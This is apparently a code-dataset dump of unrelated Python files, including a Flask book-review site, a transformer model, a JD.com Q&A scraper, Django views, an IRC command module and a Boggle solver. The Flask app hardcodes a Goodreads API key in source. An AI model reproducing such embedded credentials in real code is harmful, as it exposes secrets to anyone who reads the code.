None:\n\t\t\t#return \"Invalid Username/Password!\"\n\t\t\treturn render_template('index.html', issue='Invalid Username/Password!', result='unsuccess')\n\n\t\t\"\"\"Storing current logged in user into the session\"\"\"\n\t\tsession[\"user\"] = []\n\t\tsession[\"user\"].append(record_exist.id)\n\t\tsession[\"user\"].append(record_exist.username)\n\t\treturn render_template('search.html', user=session['user'])\n\n\telse:\n\t\tif 'user' in session:\n\t\t\treturn render_template('search.html', user=session['user'])\n\t\treturn redirect(url_for('index'))\n\n@app.route('/logout')\ndef logout():\n\tsession.pop('user')\n\treturn redirect(url_for('index'))\n\n@app.route('/search', methods=['POST','GET'])\ndef search():\n\tif request.method=='POST':\n\t\t\"\"\"Fetching all the Inputs\"\"\"\n\t\tisbn = request.form.get('isbn')\n\t\ttitle = request.form.get('title')\n\t\tauthor = request.form.get('author')\n\t\t#info = db.execute(\"SELECT * FROM books WHERE author = :author\",{'author':author}).fetchall()\n\n\t\tif request.args.get(\"f\") == 'f1':\n\t\t\tdata = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{'isbn':isbn}).fetchall()\n\n\t\telif request.args.get(\"f\") == 'f2':\n\t\t\tdata = db.execute(\"SELECT * FROM books WHERE title = :title\",{'title':title}).fetchall()\n\n\t\telif request.args.get(\"f\") == 'f3':\n\t\t\tdata = db.execute(\"SELECT * FROM books WHERE author = :author\",{'author':author}).fetchall()\n\n\t\telif request.args.get(\"f\") == 'f4':\n\t\t\tif (author is not None and title is not None and author is not None):\n\t\t\t\tdata = db.execute(\"SELECT * FROM books WHERE (title = :title AND isbn = :isbn) AND (author = :author)\",{'title':title, 'isbn':isbn,'author':author}).fetchall()\n\t\t\telse:\n\t\t\t\tdata = 'incomplete'\n\n\t\treturn render_template('searched.html', data=data)\n\n\telse:\n\t\treturn redirect(url_for('login'))\n\n@app.route('/book/', methods=['GET', 'POST'])\ndef book(no):\n\tif 'user' not in session:\n\t\t\treturn redirect(url_for('login'))\n\n\tif request.method=='GET':\n\n\t\t\"\"\"Collecting only 1 book data whose id is no\"\"\"\n\t\tbook = db.execute(\"SELECT * FROM books WHERE id = :id\",{'id':no}).fetchone()\n\n\t\t\"\"\"Checking if enter book is valid or not\"\"\"\n\t\tif book is None:\n\t\t\treturn render_template('error.html', error = 'Entered Id is Incorrect!')\n\n\t\t\"\"\"Checking if user has already reviewed it or not\"\"\"\n\t\treviewed = db.execute(\"SELECT * FROM reviews WHERE users_id = :users_id AND books_id = :books_id\",{'users_id': session['user'][0], 'books_id': no}).fetchone()\n\t\tif reviewed is None:\n\t\t\tflag = True\n\t\telse:\n\t\t\tflag = False\n\n\t\t\"\"\"Taking another people reviews to display on page\"\"\"\n\t\treviews = db.execute(\"SELECT username, rating, review FROM reviews JOIN users ON users.id = reviews.users_id WHERE books_id = :books_id\", {'books_id': no}).fetchall()\n\n\t\t\"\"\"Using API to get Goodreads Reviews\"\"\"\n\t\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"am79tEwwV9gqV6uXm5SA\", \"isbns\": book.isbn})\n\t\tdic = res.json()\n\n\t\t\"\"\"0 index showing average_rating, 1 shows reviews count\"\"\"\n\t\tgoodratings = [dic['books'][0]['average_rating'], dic['books'][0]['ratings_count']]\n\n\t\treturn render_template('book.html', book=book, flag=flag, reviews=reviews, goodratings=goodratings)\n\t\t\n\n\telse:\n\t\trating = request.form.get('rating')\n\t\tif rating is None:\n\t\t\trating = 1\n\t\treview = request.form.get('review')\n\t\tdb.execute(\"INSERT INTO reviews (users_id, books_id, rating, review) VALUES (:users_id, :books_id, :rating, :review)\", {'users_id': session['user'][0], 'books_id': no, 'rating' : int(rating), 'review': review})\n\t\tdb.commit()\n\t\treturn redirect(url_for('book', no=no))\n\n\n@app.route('/api/')\ndef api(isbn):\n\n\t\"\"\"Fetching Book\"\"\"\n\tbook = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\", {'isbn':isbn}).fetchone()\n\n\t\"\"\"Checking if book is Available or Not\"\"\"\n\tif book is None:\n\t\treturn abort(404)\n\n\t\"\"\"Calculating review counts and average score\"\"\"\n\tcal = db.execute(\"SELECT COUNT(*), AVG(rating) FROM reviews WHERE books_id = :books_id\", {'books_id': book.id}).fetchall()\n\n\ttry:\n\t\treturn jsonify({\n\t\t\t\"title\": book.title,\n\t \t\"author\": book.author,\n\t \t\"year\": book.year,\n\t \t\"isbn\": book.isbn,\n\t \t\"review_count\": cal[0].count,\n\t \t\"average_score\": float(cal[0].avg)\n\t\t\t})\n\texcept Exception:\n\t\treturn jsonify({\n\t\t\t\"title\": book.title,\n\t \t\"author\": book.author,\n\t \t\"year\": book.year,\n\t \t\"isbn\": book.isbn,\n\t \t\"review_count\": cal[0].count,\n\t \t\"average_score\": 0\n\t\t\t})\n\n\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"152775255","text":"import torch.nn as nn\nfrom .t2t_vit import T2t_vit_t_14\nfrom .Transformer import Transformer\nfrom .Transformer import token_Transformer\nfrom .Decoder import Decoder\n\n\nclass ImageDepthNet(nn.Module):\n def __init__(self, args):\n super(ImageDepthNet, self).__init__()\n\n # VST Encoder\n self.rgb_backbone = T2t_vit_t_14(pretrained=False, args=args)\n\n # VST Convertor\n self.transformer = Transformer(embed_dim=384, depth=4, num_heads=6, mlp_ratio=3.)\n\n # VST Decoder\n self.token_trans = token_Transformer(embed_dim=384, depth=4, num_heads=6, mlp_ratio=3.)\n self.decoder = Decoder(embed_dim=384, token_dim=64, depth=2, img_size=args.img_size)\n\n def forward(self, image_Input):\n\n B, _, _, _ = image_Input.shape\n # VST Encoder\n rgb_fea_1_16, rgb_fea_1_8, rgb_fea_1_4 = self.rgb_backbone(image_Input)\n\n # VST Convertor\n rgb_fea_1_16 = self.transformer(rgb_fea_1_16)\n # rgb_fea_1_16 [B, 14*14, 384]\n\n # VST Decoder\n saliency_fea_1_16, fea_1_16, saliency_tokens, contour_fea_1_16, contour_tokens = self.token_trans(rgb_fea_1_16)\n # saliency_fea_1_16 [B, 14*14, 384]\n # fea_1_16 [B, 1 + 14*14 + 1, 384]\n # saliency_tokens [B, 1, 384]\n # contour_fea_1_16 [B, 14*14, 384]\n # contour_tokens [B, 1, 384]\n\n outputs = self.decoder(saliency_fea_1_16, fea_1_16, saliency_tokens, contour_fea_1_16, contour_tokens, rgb_fea_1_8, rgb_fea_1_4)\n\n return outputs\n","sub_path":"python/NCKU_LAB_Paper/VST/RGB_VST/Models/ImageDepthNet.py","file_name":"ImageDepthNet.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"274312331","text":"countMayor, countMenor, c = 0, 0, True\nwhile (c == True):\n numero = int(input(\"Ingrese un número entero, ingrese 100 para terminar el programa: \"))\n if numero > 100:\n countMayor += 1\n elif numero < 100:\n countMenor += 1\n elif numero == 100:\n c = False\nprint(\"La cantidad de números mayores a 100 fueron: {0} \\nLa cantidad de números menores a 100 fueron: {1}\".format(countMayor,countMenor))","sub_path":"Talleres/Taller30Abril/Punto53.py","file_name":"Punto53.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"503317413","text":"# 2보다 큰 모든 짝수는 두 소수의 합으로 나타낼 수 있다. => 골드바흐의 추측\r\n\r\nimport math\r\n\r\ndef get_primes(limit):\r\n prime_board = [False] * (limit + 1)\r\n prime_board[0] = True\r\n prime_board[1] = True\r\n result = []\r\n\r\n for i in range(2, int(math.sqrt(limit)) + 1):\r\n if prime_board[i] is False:\r\n for j in range(i * 2, limit + 1, i):\r\n prime_board[j] = True\r\n\r\n for i in range(2, limit+1):\r\n if prime_board[i] is False:\r\n result.append(i)\r\n\r\n return result\r\n\r\n\r\ndef get_goldbach(n):\r\n board = get_primes(n)\r\n len_board = len(board)\r\n smaller = 0\r\n bigger = 0\r\n\r\n mid = n >> 1\r\n i = j = mid\r\n\r\n while i > 1:\r\n if i in board and j in board:\r\n return str(i)+\" \"+str(j)\r\n i -= 1\r\n j += 1\r\n\r\n\r\ndef main():\r\n inputs = []\r\n\r\n T = int(input())\r\n for t in range(T):\r\n temp_input = int(input())\r\n if (temp_input % 2 == 0) and (temp_input in range(4, 10001)):\r\n inputs.append(temp_input)\r\n else:\r\n return\r\n\r\n for each in inputs:\r\n print(get_goldbach(each))\r\n\r\nmain()\r\n","sub_path":"BAEJOON/9020_골드바흐의_추측.py","file_name":"9020_골드바흐의_추측.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"532798017","text":"import sys\n\ndef compute(l, w, h):\n extra = min([l*w, w*h, h*l])\n return 2*l*w + 2*w*h + 2*h*l + extra\n\n\nt = 0\nwith open('./data', 'r') as _in:\n for box in _in:\n t += compute(*[int(x) for x in box.split('x')])\nassert t == 1588178\n","sub_path":"2015/day2/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"110098293","text":"from django.contrib.auth import logout\r\nfrom django.http import HttpResponse\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.shortcuts import render, redirect\r\nfrom django.urls import reverse\r\n\r\nfrom korona.utils import create_spreadsheet_data\r\nfrom .models import Question, History\r\n\r\ndef update_session(request):\r\n url_list = request.session.get('urls_history')\r\n if url_list is None:\r\n request.session['urls_history'] = request.path\r\n else:\r\n url_list.append(request.path)\r\n request.session['urls_history'] = url_list\r\n\r\ndef question_view(request, pk=None):\r\n if not request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse('home'))\r\n else:\r\n # request.session['urls_history'].append(request.path)\r\n\r\n\r\n history_instance = History.objects.all().filter(assigned_user=request.user).order_by('-id')[0]\r\n questions_history = history_instance.questions_all\r\n answers_history = history_instance.answers_all\r\n # print(request.user.is_authenticated)\r\n question = Question.objects.filter(pk=pk).first()\r\n # print(question.choice_set.all())\r\n numerical = False\r\n if len(list(question.choice_set.all())) == 0:\r\n numerical = True\r\n context = {'question': question,\r\n 'numerical': numerical,\r\n 'code': request.user.username}\r\n\r\n questions_history = f'{questions_history}||{question.question_text}'\r\n if request.method == 'POST':\r\n update_session(request)\r\n\r\n if numerical:\r\n value = request.POST.get('value')\r\n answers_history = f'{answers_history}||{value}'\r\n history_instance.questions_all = questions_history\r\n history_instance.answers_all = answers_history\r\n history_instance.save()\r\n if question.next_question is None:\r\n # return HttpResponseRedirect(reverse('polls:final'))\r\n logout(request)\r\n return render(request, 'final.html', context)\r\n else:\r\n next_question_id = question.next_question.id\r\n # return HttpResponseRedirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n return redirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n else:\r\n selected_choice = question.choice_set.get(pk=request.POST.get('choice'))\r\n answers_history = f'{answers_history}||{selected_choice.choice_text}'\r\n history_instance.questions_all = questions_history\r\n history_instance.answers_all = answers_history\r\n history_instance.save()\r\n if not (selected_choice.final):\r\n if len(list(selected_choice.choiceorder_set.all().values())) > 0:\r\n next_question_id = list(selected_choice.choiceorder_set.all().values())[0]['question_id']\r\n # return HttpResponseRedirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n return redirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n else:\r\n logout(request)\r\n # return HttpResponseRedirect(reverse('polls:final'))\r\n return render(request, 'final.html', context)\r\n\r\n return render(request, 'question_detail.html', context)\r\n\r\n\r\ndef output_view(request):\r\n context = {}\r\n if request.method == 'POST':\r\n code = request.POST.get('code')\r\n data = create_spreadsheet_data(code=code)\r\n\r\n if data is not None:\r\n response = HttpResponse(data,\r\n content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\r\n response['Content-Disposition'] = 'attachment; filename=\"output' + code + '.xlsx\"'\r\n return response\r\n else:\r\n context['message'] = 'Brak danych przypisanych do danego kodu'\r\n return render(request, 'output.html', context)\r\n\r\n\r\ndef intro_view(request):\r\n request.session['urls_history'] = [request.path]\r\n context = {}\r\n context['code'] = request.user.username\r\n if request.method == 'POST':\r\n return HttpResponseRedirect(reverse('polls:question-detail', args=(3,)))\r\n else:\r\n return render(request, 'intro.html', context)\r\n\r\n\r\ndef return_view(request):\r\n urls = request.session['urls_history']\r\n prev_url = urls[-1]\r\n if 'intro' in prev_url.split('/')[-1]:\r\n return redirect(request.META.get('HTTP_REFERER'))\r\n\r\n history_instance = History.objects.all().filter(assigned_user=request.user).order_by('-id')[0]\r\n history_instance.answers_all = '||'.join(history_instance.answers_all.split('||')[:-1])\r\n history_instance.questions_all = '||'.join(history_instance.questions_all.split('||')[:-1])\r\n history_instance.save()\r\n urls = request.session['urls_history']\r\n prev_url = urls[-1]\r\n request.session['urls_history'] = urls[:-1]\r\n return redirect(prev_url)","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"369769991","text":"def monotonic_array(arr):\n # find if negative or positive\n # -1, -10, -11, -12, -15\n if len(arr) <= 2: return True\n \n i = 0\n direction = 0\n while i < len(arr)-1:\n mono = arr[i] - arr[i+1]\n if mono != 0:\n if arr[i+1] > arr[i]:\n direction = 1\n break\n else:\n direction = -1\n break\n i += 1\n \n if direction == 0: return True\n \n while i < len(arr) - 1:\n if not same_direction(arr[i], arr[i+1], direction):\n return False\n i += 1\n return True\n\ndef same_direction(one, two, direction):\n if two > one and direction < 0:\n return False\n elif two < one and direction > 0:\n return False\n return True\n \n\nif __name__ == \"__main__\":\n print(monotonic_array([5,7,6]))","sub_path":"algoexpert/arrays/monotonic.py","file_name":"monotonic.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"532034631","text":"# -*- coding: utf-8 -*-\nimport re\nimport requests\nimport time\n\n\ndef parse_Answer(q_id):\n i = 1\n out = open(\"./Output/Answer.txt\", \"a\")\n while True:\n with requests.session() as MySession:\n url = 'http://question.jd.com/question/getAnswerListById.action'\n data = {\n 'questionId':'%s' %q_id,\n 'page':i\n }\n data = MySession.get(url, params = data).text\n if data:\n lines = re.findall('\"content\":\"(.*?)\"', data)\n if lines:\n for line in lines:\n print(line)\n out.write(line)\n out.write(\"\\n\")\n else:\n print('--------------Parse Question Finished--------------')\n out.close()\n break\n else:\n print('--------------Parse Question Error--------------')\n out.close()\n break\n i = i + 1\n time.sleep(5)\n\ndef parse_Product(p_id):\n i = 1\n out = open(\"./Output/Question.txt\", \"a\")\n while True:\n with requests.session() as MySession:\n url = 'http://question.jd.com/question/getQuestionAnswerList.action'\n API = {\n 'productId':'%s' %p_id,\n 'page':i\n }\n data = MySession.get(url, params = API).text\n if data:\n lines = re.findall(r'\"id\":(\\d+),\"content\":\"(.*?)\"', data)\n loop = 1\n if lines:\n for QID,Question in lines:\n print(Question)\n out.write(Question)\n out.write(\"\\n\")\n parse_Answer(QID)\n loop = loop + 1\n else:\n print('--------------Parsing Product Finished--------------')\n out.close()\n break\n\n else:\n print('--------------Parsing Product Error--------------')\n out.close()\n break\n i = i + 1\n time.sleep(5)\n\ndef run():\n with open(\"./PID/PID_babycare.json\") as f:\n for line in f:\n try:\n pid = re.findall(r'\"PID\": \"(.*?)\"', line)[0]\n parse_Product(pid)\n except IndexError:\n pass\n\nif __name__ == '__main__':\n run()","sub_path":"Conversation/spiders/conversation_request.py","file_name":"conversation_request.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"130056740","text":"import csv\nfrom mygate.models import FoodTruckData\nfrom datetime import datetime\n\n\ndef populate():\n remarks_file = open('Mobile_Food_Facility_Permit.csv','r')\n csv_reader = csv.reader(remarks_file, dialect='excel')\n csv_reader.next()\n datas = []\n for row in csv_reader:\n try:\n apr = datetime.strptime(row[19], \"%m/%d/%Y %I:%M:%S %p\")\n except:\n apr = None\n try:\n rec = datetime.strptime(row[20], \"%Y-%M-%d\")\n except:\n rec = None\n try:\n exp = datetime.strptime(row[22], \"%m/%d/%Y %I:%M:%S %p\")\n except:\n exp = None\n datas.append(FoodTruckData(location_id = row[0], name = row[1], street = row[5], status=row[10], received=rec, permit=row[9], facility_type=row[2], approval_time=apr, expiry_time=exp))\n # FoodTruckData.objects.create(location_id = row[0], name = row[1], street = row[5], status=row[10], received=rec, permit=row[9], facility_type=row[2], approval_time=apr, expiry_time=exp)\n FoodTruckData.objects.bulk_create(datas, batch_size=1000)\n","sub_path":"scripts/populate_food_data.py","file_name":"populate_food_data.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653354325","text":"\"\"\"server URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom placement import views as placement_views\nfrom auth import views as auth_views\n\nhandler404 = 'auth_views.handler404'\nhandler500 = 'auth_views.handler500'\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include('api.urls')),\n # url(r'^notice/', include('notice.urls')),\n url(r'^placement/', include('placement.urls')),\n url(r'^auth/', include('auth.urls')),\n url(r'^login', auth_views.login_view),\n url(r'^logout', auth_views.logout_view),\n url(r'^signup', auth_views.signup_view),\n url(r'^placement/', include('auth.urls')),\n url(r'^profile', auth_views.profile_view),\n url(r'^$', placement_views.index),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\nadmin.site.site_header = 'e-TPO Admin Panel'\nadmin.site.site_title = 'e-TPO Admin Panel'","sub_path":"server/server/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"353419033","text":"\"\"\"syphon.core.check.py\n\n Copyright Keithley Instruments, LLC.\n Licensed under MIT (https://github.com/tektronix/syphon/blob/master/LICENSE)\n\n\"\"\"\nimport os.path\nimport pathlib\nfrom typing import Callable, Optional\n\nimport syphon.errors\nimport syphon.hash\n\nDEFAULT_FILE = \".sha256sums\"\n\n\ndef check(\n cache_filepath: str,\n hash_filepath: Optional[str] = None,\n hash_line_split: Optional[\n Callable[[str], Optional[syphon.hash.SplitResult]]\n ] = None,\n verbose: bool = False,\n) -> bool:\n # NOTE:\n # the archive & build function use the exact same wording for \"hash_filepath\".\n \"\"\"Verify the integrity of the built cache file.\n\n Args:\n cache_filepath: Path to the target output file.\n hash_filepath: Path to a file containing a SHA256 sum of the cache. If not\n given, then the default is calculated by joining the cache directory with\n `syphon.core.check.DEFAULT_FILE`.\n hash_line_split: A callable object that returns a `syphon.hash.SplitResult`\n from a given line or None if the line is in an unexpected format. Returning\n None raises a MalformedLineError.\n verbose: Whether to print what is being done to the standard output.\n\n Returns:\n True if the cache file passed the integrity check, False otherwise.\n \"\"\"\n\n def _print(message: str) -> None:\n if verbose:\n print(message)\n\n actual_entry = syphon.hash.HashEntry(cache_filepath)\n if not actual_entry.filepath.exists():\n _print(f\"No file exists @ {actual_entry.filepath}\")\n return False\n\n hash_filepath = (\n os.path.join(actual_entry.filepath.parents[0], DEFAULT_FILE)\n if hash_filepath is None\n else hash_filepath\n )\n hash_path = pathlib.Path(hash_filepath)\n if not hash_path.exists():\n _print(f\"No file exists @ {hash_filepath}\")\n return False\n\n expected_entry: Optional[syphon.hash.HashEntry] = None\n try:\n # Find the hash entry for the provided cache filepath.\n with syphon.hash.HashFile(hash_filepath) as hashfile:\n hashfile.line_split = hash_line_split\n entry: syphon.hash.HashEntry\n for entry in hashfile:\n if not entry.filepath.exists():\n continue\n if actual_entry.filepath.samefile(entry.filepath):\n expected_entry = entry\n break\n except OSError:\n _print(f\"Error reading hash file @ {hash_path.absolute()}\")\n return False\n except syphon.errors.MalformedLineError as err:\n _print(f'Error parsing hash entry \"{err.line}\"')\n return False\n\n if expected_entry is None:\n _print(f'No entry for file \"{cache_filepath}\" found in \"{hash_path}\"')\n return False\n\n try:\n # The expected entry's hash will already be cached as a side-effect of reading\n # it from the hashfile. That leaves the actual entry to blame for any OSErrors.\n result: bool = expected_entry.hash == actual_entry.hash\n _print(f\"{cache_filepath}: {'OK' if result else 'FAILED'}\")\n return result\n except OSError:\n _print(f\"Error reading cache file @ {cache_filepath}\")\n return False\n","sub_path":"syphon/core/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478235060","text":"# -*- coding: utf-8 -*-\n\n'''\n\n iteration :迭代\n迭代是什么?\n其实就是将列表&元组&字典遍历的方式叫做遍历\n不过这里字典有点特殊,默认迭代的是key值,如果需要迭代value,则是dict.values()\n下面一一讲解。\n\n'''\n\n# 1、遍历列表\n# 寻找最大值,最小值\na = [1, 2, 3, 14, 6, 17, 9]\nmin = max = a[0]\nfor i in a:\n if i > max:\n max = i\n if i < min:\n min = 1\nprint('最大值:', max)\nprint('最小值', min)\n\n\n# 2、遍历字典\n\na = {\n 'name': 'hzb',\n 'info':{\n 'height': '180',\n 'location': '上海'\n }\n}\nfor dict in a:\n print(dict)\n\nfor dict in a.values():\n print(dict)\n\n","sub_path":"python进阶/iteration.py","file_name":"iteration.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"120307721","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Hostuser', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='phone',\n field=models.CharField(default=b'00000000000', max_length=15, validators=[django.core.validators.RegexValidator(b'^\\\\d{0,10}$')]),\n ),\n ]\n","sub_path":"Hostuser/migrations/0002_auto_20151223_0808.py","file_name":"0002_auto_20151223_0808.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"266186903","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.contacts.models import Company, Contact, CompanyBankAccount\n\n\n@admin.register(Company)\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ['company_name', 'company_nip', 'company_regon',\n 'address_street', 'address_postcode', 'address_city', 'address_country']\n list_display = ['pk',\n 'company_name', 'company_nip', 'company_regon',\n 'address_street', 'address_postcode', 'address_city', 'address_country']\n\n\n@admin.register(Contact)\nclass ContactAdmin(admin.ModelAdmin):\n list_filter = ['contact_type']\n search_fields = ['company_name', 'company_nip', 'company_regon',\n 'person_first_name', 'person_last_name',\n 'address_street', 'address_postcode', 'address_city',\n 'address_country']\n list_display = ['pk', 'contact_type',\n 'company_name', 'company_nip', 'company_regon',\n 'receiver_name', 'person_first_name', 'person_last_name',\n 'address_street', 'address_postcode', 'address_city',\n 'address_country']\n fieldsets = [\n [\n None,\n {'fields': ['contact_type']}\n ],\n [\n Contact.TYPES[Contact.TYPE_PERSONAL],\n {'fields': ['person_first_name', 'person_last_name']}\n ],\n [\n Contact.TYPES[Contact.TYPE_COMPANY],\n {'fields': ['company_name', 'company_nip', 'company_regon']}\n ],\n [\n _('Address'),\n {'fields': ['address_city', 'address_street', 'address_postcode', 'address_country']}\n ],\n [\n Contact.TYPES[Contact.TYPE_GOV],\n {'fields': ['receiver_name', 'receiver_city', 'receiver_street', 'receiver_postcode', 'receiver_country']}\n ],\n ]\n\n\n@admin.register(CompanyBankAccount)\nclass CompanyBankAccountAdmin(admin.ModelAdmin):\n search_fields = ['bank_name']\n list_display = [\n 'slug', 'bank_account_number', 'iban', 'bank_name', 'bank_name',\n ]\n","sub_path":"apps/contacts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"460759870","text":"from twisted.plugin import IPlugin\nfrom twisted.words.protocols import irc\nfrom txircd.module_interface import Command, ICommand, IModuleData, ModuleData\nfrom zope.interface import implements\n\nclass ConnectCommand(ModuleData, Command):\n\timplements(IPlugin, IModuleData, ICommand)\n\t\n\tname = \"ConnectCommand\"\n\tcore = True\n\t\n\tdef actions(self):\n\t\treturn [ (\"commandpermission-CONNECT\", 1, self.canConnect) ]\n\t\n\tdef userCommands(self):\n\t\treturn [ (\"CONNECT\", 1, self) ]\n\t\n\tdef canConnect(self, user, data):\n\t\tif not self.ircd.runActionUntilValue(\"userhasoperpermission\", user, \"command-connect\", users=[user]):\n\t\t\tuser.sendMessage(irc.ERR_NOPRIVILEGES, \"Permission denied - You do not have the correct operator privileges\")\n\t\t\treturn False\n\t\treturn None\n\t\n\tdef parseParams(self, user, params, prefix, tags):\n\t\tif not params:\n\t\t\tuser.sendSingleError(\"ConnectParams\", irc.ERR_NEEDMOREPARAMS, \"CONNECT\", \"Not enough parameters\")\n\t\t\treturn None\n\t\treturn {\n\t\t\t\"server\": params[0]\n\t\t}\n\t\n\tdef execute(self, user, data):\n\t\tserverName = data[\"server\"]\n\t\tif serverName in self.ircd.serverNames:\n\t\t\tuser.sendMessage(\"NOTICE\", \"*** Server {} is already on the network\".format(serverName))\n\t\telif self.ircd.connectServer(serverName):\n\t\t\tuser.sendMessage(\"NOTICE\", \"*** Connecting to {}\".format(serverName))\n\t\telse:\n\t\t\tuser.sendMessage(\"NOTICE\", \"*** Failed to connect to {}; it's likely not configured.\".format(serverName))\n\t\treturn True\n\nconnectCmd = ConnectCommand()","sub_path":"txircd/modules/rfc/cmd_connect.py","file_name":"cmd_connect.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"646077332","text":"import random\n'''\nIn order to watch how the code works behind the scenes, set debug to True\n'''\ndebug = False\n\ndef load_words():\n\n '''\n Loads uppered words with length >= 3 from words_alpha.txt into a set and returns it.\n '''\n\n with open('english-words-master\\english-words-master\\words_alpha.txt') as word_file:\n valid_words = set()\n for word in word_file.read().split():\n if len(word) >= 3:\n valid_words.add(word.upper())\n\n # valid_words = set(word_file.read().split())\n\n if debug: print(\"Words loaded: {}\".format('FATE' in valid_words))\n\n return valid_words\n\ndef randomize_board():\n\n '''\n Simulates rolling the standard \"Boggle\" dice into random slots on a grid and returns this as a 2D list for the game board.\n '''\n\n die = [\n ['R', 'I', 'F', 'O', 'B', 'X'],\n ['I', 'F', 'E', 'H', 'E', 'Y'],\n ['D', 'E', 'N', 'O', 'W', 'S'],\n ['U', 'T', 'O', 'K', 'N', 'D'],\n ['H', 'M', 'S', 'R', 'A', 'O'],\n ['L', 'U', 'P', 'E', 'T', 'S'],\n ['A', 'C', 'I', 'T', 'O', 'A'],\n ['Y', 'L', 'G', 'K', 'U', 'E'],\n ['Q', 'B', 'M', 'J', 'O', 'A'],\n ['E', 'H', 'I', 'S', 'P', 'N'],\n ['V', 'E', 'T', 'I', 'G', 'N'],\n ['B', 'A', 'L', 'I', 'Y', 'T'],\n ['E', 'Z', 'A', 'V', 'N', 'D'],\n ['R', 'A', 'L', 'E', 'S', 'C'],\n ['U', 'W', 'I', 'L', 'R', 'G'],\n ['P', 'A', 'C', 'E', 'M', 'D'],\n ]\n\n board = []\n\n die_indices = [i for i in range(16)]\n random.shuffle(die_indices)\n\n for index in die_indices:\n board.append(random.choice(die[index]))\n\n board = [board[0:4], board[4:8], board[8:12], board[12:]]\n\n if debug:\n print(\"Board Generated:\")\n for row in board:\n print(row)\n\n return board\n\ndef search_word(word, board, words):\n\n '''\n Verifies if the word is in the set of real words and attainable through the game board.\n '''\n\n letters = board[0]+board[1]+board[2]+board[3]\n\n if len(word) < 3:\n if debug: print(\"{} is too short.\".format(word))\n return False\n\n if word not in words:\n if debug: print(\"{} is not a word.\".format(word))\n return False\n\n if word[0] not in letters:\n if debug: print(\"{}'s first letter {} is not on the board.\".format(word, word[0]))\n return False\n\n stack = []\n for i in range(4):\n for j in range(4):\n if board[i][j] == word[0]:\n stack.append((i,j,0,[(i,j)]))\n if debug: print(\"Initial stack: {}\".format(stack))\n\n while stack:\n if debug: print(\"Current stack: {}\".format(stack))\n current = stack.pop()\n i, j, k, visited = current[0], current[1], current[2], current[3]\n\n directions = [(0,-1), (-1,-1), (-1,0), (-1,1), (0,1), (1,1), (1,0), (1,-1)]\n\n if k == len(word)-1:\n if debug: print(\"Found {} by {}\".format(word, visited))\n return True\n\n for direction in directions:\n x, y = i+direction[0], j+direction[1]\n if 0 <= x < 4 and 0 <= y < 4:\n if board[x][y] == word[k+1] and (x,y) not in visited:\n stack.append((x, y, k+1, visited+[(x, y)]))\n\n if debug: print(\"{} not on board\".format(word))\n return False\n\ndef 